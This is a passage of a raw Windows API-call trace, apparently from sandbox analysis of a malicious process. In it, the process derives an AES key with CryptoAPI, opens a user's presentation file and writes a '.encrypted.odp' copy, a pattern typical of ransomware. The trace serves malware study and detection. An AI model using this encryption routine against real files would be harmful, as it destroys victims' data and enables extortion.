[0033.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.379] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.379] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.379] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.379] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.379] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.380] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.380] CryptHashData (hHash=0x7c2100, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.380] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.381] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.381] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.381] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2100, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.381] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.381] CryptDestroyHash (hHash=0x7c2100) returned 1 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0033.381] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0033.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0033.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.382] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\bqdze 0.odp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.382] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.382] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0033.382] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.382] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.382] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0033.383] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0033.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3c8 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc0) returned 0x7c75d0 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c75d0 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3c8 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0033.384] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66")) returned 0x10 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0033.385] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\bQdze 0.encrypted.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\bqdze 0.encrypted.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.385] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.385] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0033.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0033.386] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.386] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.386] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0033.386] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0033.386] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xd257, lpOverlapped=0x0) returned 1 [0033.388] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0033.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.388] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.388] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0033.388] RtlAllocateHeap (HeapHandle=0x770000, 